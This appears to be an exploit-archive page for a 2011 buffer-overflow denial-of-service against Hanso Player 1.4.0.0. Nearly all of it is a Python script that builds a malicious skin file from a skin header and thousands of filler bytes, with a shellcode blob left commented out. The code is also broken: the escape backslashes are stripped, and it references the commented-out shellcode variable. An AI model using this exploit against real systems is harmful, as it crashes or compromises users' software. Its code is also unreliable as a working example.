Hanso Player 1.4.0.0 Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile
# Published : 2011-02-06
# Author : badc0re
# Previous Title : XM Easy Personal FTP Server 5.8.0 (TYPE) Denial Of Service
# Next Title : Hanso Converter v1.1.0 BufferOverflow - Denial Of Service

# Exploit Title: Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile
# Date: 05.02.2011
# Author: Dame Jovanoski(badc0re)
# Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe
# Version: 1.4.0.0
# Tested on: XP sp3


from struct import *
import time
f=open("default.ini","w")
#shell=("x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61"
#       "x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13"
#       "x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f"
#       "xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b"
#       "x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30"
#       "xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72"
#       "x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd"
#       "x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e"
#       "x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52"
#       "x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56");
print "Creating expoit."
time.sleep(1)
print "Creating explot.."
time.sleep(1)
print "Creating explot..."
junk="x41"*4418
print "Your shellcode size is:",len(shell)
head=("x5Bx48x61x6Ex73x6Fx20x50"
      "x6Cx61x79x65x72x20x53x6B"
      "x69x6Ex5Dx0A")
try:    
    f.write(head+junk)  
    f.close()
    print "File created"
except:
    print "File cannot be created"